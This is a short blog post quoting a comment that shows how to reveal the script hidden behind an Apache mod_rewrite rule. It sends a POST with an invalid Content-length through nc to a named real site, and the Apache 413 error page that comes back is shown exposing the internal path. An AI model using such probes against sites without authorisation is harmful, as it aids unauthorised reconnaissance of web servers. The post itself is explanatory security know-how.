Determine script name behind a mod_rewrite

Qouted from here : http://ptresearch.blogspot.com/2010/09/fuzzing-of-modrewrite-protected-site.html?showComment=1284996551492#c3759944444184118630

0x32353031 said...

determining the script name is pretty easy.
just a lil trick to use:

H=ha.ckers.org; echo -ne "POST /blog/category/webappsec/books/ HTTP/1.1\nHost: $H\nConnection: close\nContent-length: x\n\n" | nc $H 80 | less

note the content-length field's value... its invalid :P

This will produce a simple HTTP/1.1 413 Request Entity Too Large, with a common 413 error message/html followed by the site's code.

take a closer look...

HTTP/1.1 413 Request Entity Too Large
Date: Mon, 20 Sep 2010 14:56:41 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=iso-8859-1

!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"
html head
title 413 Request Entity Too Large /title
head body
h1 Request Entity Too Large /h1
The requested resource br / /blog/index.php br /

...etc html blah blah

rewite revealed, its pointin to /blog/index.php
apache bug/"feature", works most of the time.
thats all :)

-CJ

Super nice hack.

//alak

Comments

Popular posts from this blog

SAP Backdoors {placeholder Post]

Fiori Apps Keep Calling Internal Hostname / Internal FQDN